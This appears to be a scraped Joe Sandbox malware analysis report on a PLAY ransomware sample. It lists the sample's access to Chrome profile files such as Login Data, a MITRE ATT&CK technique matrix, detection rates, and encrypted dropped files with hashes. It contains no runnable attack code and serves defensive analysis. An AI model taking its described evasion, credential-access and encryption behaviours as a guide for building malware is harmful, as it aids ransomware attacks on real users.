        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Platform Notifications\LOGJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\PreferredAppsJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENTJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\JumpListIconsRecentClosed\d6cad3df-fce0-43ed-bb96-ffad9e6c76e6.tmpJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GCM Store\Encryption\LOGJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Reporting and NELJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Media HistoryJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Platform Notifications\CURRENTJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sessions\Tabs_13305159347206338Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.oldJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\CURRENTJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\previews_opt_out.dbJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GCM Store\Encryption\MANIFEST-000001Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Secure PreferencesJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Google Profile.icoJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GCM Store\000003.logJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Session Storage\LOGJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\LOG.oldJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Scripts\LOGJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG.oldJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Scripts\000003.logJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\000003.logJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network Action PredictorJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Scripts\CURRENTJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\DownloadMetadataJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Platform Notifications\MANIFEST-000001Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sessions\Tabs_13305159337222731Jump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Session Storage\CURRENTJump to behavior
        Source: C:\Users\user\Desktop\PLAY.mal_.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.oldJump to behavior

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        1
        Replication Through Removable Media        		Windows Management Instrumentation1
        DLL Side-Loading        		1
        Process Injection        		1
        Virtualization/Sandbox Evasion        		1
        OS Credential Dumping        		1
        System Time Discovery        		1
        Replication Through Removable Media        		21
        Input Capture        		Exfiltration Over Other Network Medium1
        Encrypted Channel        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading        		1
        Process Injection        		21
        Input Capture        		21
        Security Software Discovery        		Remote Desktop Protocol1
        Archive Collected Data        		Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
        Obfuscated Files or Information        		Security Account Manager1
        Virtualization/Sandbox Evasion        		SMB/Windows Admin Shares1
        Data from Local System        		Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
        DLL Side-Loading        		NTDS1
        Process Discovery        		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets11
        Peripheral Device Discovery        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
        System Network Configuration Discovery        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync3
        File and Directory Discovery        		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem14
        System Information Discovery        		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        PLAY.mal_.exe81%ReversingLabsWin32.Ransomware.PlayCrypt
        PLAY.mal_.exe72%VirustotalBrowse
        PLAY.mal_.exe45%MetadefenderBrowse
        PLAY.mal_.exe100%AviraTR/FileCoder.zcerj

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        No contacted domains info

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious

        Private

        IP
        192.168.2.148
        192.168.2.149
        192.168.2.146
        192.168.2.147
        192.168.2.140
        192.168.2.141
        192.168.2.144
        192.168.2.145
        192.168.2.142
        192.168.2.143
        192.168.2.159
        192.168.2.157
        192.168.2.158
        192.168.2.151
        192.168.2.152
        192.168.2.150
        192.168.2.155
        192.168.2.156
        192.168.2.153
        192.168.2.154
        192.168.2.126
        192.168.2.247
        192.168.2.127
        192.168.2.248
        192.168.2.124
        192.168.2.245
        192.168.2.125
        192.168.2.246
        192.168.2.128
        192.168.2.249
        192.168.2.129
        192.168.2.240
        192.168.2.122
        192.168.2.243
        192.168.2.123
        192.168.2.244
        192.168.2.120
        192.168.2.241
        192.168.2.121
        192.168.2.242
        192.168.2.97
        192.168.2.137
        192.168.2.96
        192.168.2.138
        192.168.2.99
        192.168.2.135
        192.168.2.98
        192.168.2.136
        192.168.2.139
        192.168.2.250
        192.168.2.130
        192.168.2.251
        192.168.2.91
        192.168.2.90
        192.168.2.93
        192.168.2.133
        192.168.2.254
        192.168.2.92
        192.168.2.134
        192.168.2.95
        192.168.2.131
        192.168.2.252
        192.168.2.94
        192.168.2.132
        192.168.2.253
        192.168.2.104
        192.168.2.225
        192.168.2.105
        192.168.2.226
        192.168.2.102
        192.168.2.223
        192.168.2.103
        192.168.2.224
        192.168.2.108
        192.168.2.229
        192.168.2.109
        192.168.2.106
        192.168.2.227
        192.168.2.107
        192.168.2.228
        192.168.2.100
        192.168.2.221
        192.168.2.101
        192.168.2.222
        192.168.2.220
        192.168.2.115
        192.168.2.236
        192.168.2.116
        192.168.2.237
        192.168.2.113
        192.168.2.234
        192.168.2.114
        192.168.2.235
        192.168.2.119
        192.168.2.117
        192.168.2.238
        192.168.2.118
        192.168.2.239
        192.168.2.111
        192.168.2.232

        General Information

        Joe Sandbox Version:35.0.0 Citrine
        Analysis ID:695797
        Start date and time:2022-09-01 23:17:24 +02:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 11m 5s
        Hypervisor based Inspection enabled:false
        Report type:full
        Sample file name:PLAY.mal_.exe
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Run name:Run with higher sleep bypass
        Number of analysed new started processes analysed:9
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal64.rans.spyw.winEXE@1/514@0/100
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:
        • Successful, ratio: 99.1% (good quality ratio 79.4%)
        • Quality average: 65.4%
        • Quality standard deviation: 39.1%
        HCA Information:
        • Successful, ratio: 99%
        • Number of executed functions: 85
        • Number of non-executed functions: 22
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Adjust boot time
        • Enable AMSI
        • Sleeps bigger than 300000ms are automatically reduced to 1000ms

        Warnings

        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 23.211.6.115
        • Excluded domains from analysis (whitelisted): www.bing.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtCreateFile calls found.
        • Report size getting too big, too many NtDeviceIoControlFile calls found.
        • Report size getting too big, too many NtOpenFile calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Report size getting too big, too many NtReadFile calls found.
        • Report size getting too big, too many NtSetInformationFile calls found.
        • Report size getting too big, too many NtWriteFile calls found.

        Simulations

        Behavior and APIs

        No simulations

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASNs

        No context

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        A:\Recovery\WindowsRE\ReAgent.xml.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2184
        Entropy (8bit):7.901481767430074
        Encrypted:false
        SSDEEP:48:XlU/ucqRTZu0Dd74roScaWn7BR3Olcir034HYxwpKxBSQTxWqYVFbT3i:Xu/ur7u0DN4rohB7BR+Wio3KpKxBS61V
        MD5:9F4D6DDBCC64127D42A165E53513E34C
        SHA1:626A3F2349A8A42BFCC739E24E93EEDE3D7E83A3
        SHA-256:DC9724F746D805F7D836B92939634D2AE81F26D0176E0B3AD8319D8F9067D98D
        SHA-512:8FD5508BD3AF7992F298DEB563ADFDBA1F790A2324CF60F23257B3205C103C616512E10851AE3849B78980BE3E34A1F14FAF82CD9B230F0F9AC8A7A8AABBA391
        Malicious:false
        Reputation:low
        Preview:1L.?...KjJ...5...q...2..y.V!.../..o..`.=^....q.jq.0FS.g..ln5.x.!.8%..n'."..8.n...-......#>d....d.x..o..3..%.......y.....K.%.MD_....>.. .7..m.6$......g.Dz.;../.|...@..x.}b|....E..)K....a..8...K.0|.5...W/..CQ...9...(N.J..d...d_.i.-.._...>..3(..e.8.c...M).D..y..7}B.q.P.4M........9..*].3.........................f.ko....W..~d.}b.......+^Q...4.3(A.Nm....}.{4..{#.Y.u[....... .i?'F.x...~..Jm1[..j|./...8. .S.C...K...w.nP.p`Q.`....o........{...:c7mo.s.X.......V.\D.C.E.....u=?...I.... .fC..{. ......$..$.d@.i.P.Y.~l..G.'.....h....Gdk...WP..e......9E.c..-.m....'....=.C..e._.u5...3U.......Sf....N4....Yd_1.CJ.+...V.K.:e.=...".6.P..]....@..(..S@.._X....;.............*.b...'.j?.. ^.....v.r0{.![.e.C3.y.....y.m6.t..i....@C....q...^ .9..(..mqP.....ie.o....v}..1....C.->g.j.?P.....X,......'..P{...5c.g..@Y.4P..K..Q..W&.f.....ng."%W.w%....b..aG.2O3....|.<#..}..J.%.%....z.#/.{.Ig.5.%c.....+..Xz.W.C....\O.......*".vv.2.Y.....(..O+.H...go...9....X.....rH.ee..~.D.#N

        A:\Recovery\WindowsRE\boot.sdi.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3171384
        Entropy (8bit):7.999942819379644
        Encrypted:true
        SSDEEP:98304:BEPpO6hDzvTzAFn29gcVNJswiwOgvjyu2jCgX:BEhO0DzvTcFCgarjOgvjyl+0
        MD5:4520F44B0C1BAE13EC8018DA94C25C60
        SHA1:9FDE0E46B442DD8BCB32AD7061A61364B71A8613
        SHA-256:5FD32D4EE26BF0F9CC89771E464CD422DF36671DF350C415DA74855E815AFFFA
        SHA-512:9EDB8C36ADE8CFB2B2CBC852337594480F46A57E1FF7AF365CACF4701312D1200EE477F3F1F73E4EF8E42B46AC935AC1DDE0E14278549DE4E17FB7CE0F2E928E
        Malicious:true
        Reputation:low
        Preview:..s{.,j....n].b.~..l(C.rO......n.h.....!.o.~. .....e.`.w.=..E...j.....K.f...>...-...D..[m[.~.>h|..C..R.+nH.A|.hJ.-...}/....a.nn.b..ZxL....Vq8....a..].!/.....N...._..r.S3../so......m4....&yV.Y....!sZ......~W.2*.f........%FVm...KN....E..t...Q.FKm.....$R..z.......D..ja..{.3Sf.D....i..t.I..e.\.U..B..c..^M**S=*d@...o.Z......Q.d7.~Tc.i.......n.4M..z:J...........K.K.....&.*.*............ .v...KG...b...1....| ;b.:.X68..._V..Pq.Z^..e.h......|\..Nb.!.7G...@..S.......*W. ...@..xU......8c.....HR$.,..D.5Y.n..W`.>F|..jO.JeFK.p..m.&..z.....h...G.Zc...9...i..\........u.YT.f.d...u..EH;....k.Q....l$.mW&.R......)^.Q.....C.N.e...z...7I}...[...|....3..1V{/sOus.\......."...t...g....V.5.j..?.C$.....b..c'._.v~.^..@4.V......D....0.5.2,...n._.-~.... g.....HQD..l...2;...,..........?~.<..K`..4lD.....D.y.L...n.3....$gT.....Z.zN..K.fL..T.u..XX@.3.j...\...Sd8.2......%M.`...AG...}?.^!".`..y..U%.L.n...r..IOL.j....;..%.u..3.|...y..|#...8..^....sr..a......#zy.i.)...<6

        C:\$Recycle.Bin\S-1-5-18\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1208
        Entropy (8bit):7.837980272830663
        Encrypted:false
        SSDEEP:24:ytvFL8vlRCQsoHKOy+9UjTYF6Z2gunlojV/q8R2V5J+biE:yFF+lRlD5WYPgul6/q8ib+biE
        MD5:84631327BF326193F59D5FBE4805151C
        SHA1:5533A6A3C291C38F6ABECB97DB8D0666673C6863
        SHA-256:2A6E444C7B9ED7F1AFF2732A71B7DAE64C1232C80EFC793AB5B1B5C6682F8B2B
        SHA-512:5BBA6D741C9B11904B79F43BDED9CE9EED77210586AAF9FF16B4F073439BD3DDCB4409CE0405C72324246AB870EC1969B55BF842C893B92A2F2E64AE8C256EAE
        Malicious:false
        Reputation:low
        Preview:...8.....g ......MP.|S..z.0...7.?...q.sK>..v..+B.!@d.y..en.8..|Lo...n..F.w... v.bP....~...*.}C@..+....#..%A{5.s=...8B:.,>B6.T..+wn^j\).4.....T..U.|.!.I>.......................... rkG.......A.{.c.4.A5.].\.}({A..D...!1..2..9u....#SO#....7..n(l..u.....d....V(v.......s..}>.....W.cU.2.#,I.."L^.7Q....@.....J.CX.......F.....(..{.L...+.H.6E.5u[...+q.8.....A.4/&...1....?n.^4.a.w~.}Z......2.....U..)....H.E(...m.3.wC...:..e(..#.w..?..2....KEFa.WR..7...&.....1.vG......[_.w.'9o....%.._..O..(....i..^...:U.a.2.......$.\aH..+.1.6.|6o#7q....?m..j..v,...&...w.fF.K...K.=..=`.?...aQ...!..8$.8..4#.z...H.GfAT5.e...l.}....~Z.....%..\......xs<.,.:....z...q.g.O..........N.7.....I.x..v......e..)kI6.`.d......M'$.w.......2.:c"3.}p....].I..L<..J..0]..0.w.e.{.Y._............l.1.?..<q..Qq.-...Y....W.6.V.a.T.\8b..+.>.....n./.i.3f~..%.....C(......2...b.)I(9...x.,..v1.t........'q.......uT\..@.Rg...i.th...X..vP..a...V..B.[~....^..+...mK..... ._.Q...{.?..(.W.....(.t....w^j.{.

